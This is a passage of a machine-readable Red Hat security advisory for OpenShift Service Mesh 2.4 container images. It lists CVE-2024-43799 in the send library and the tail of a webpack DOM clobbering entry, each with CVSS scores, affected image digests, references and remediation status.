"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
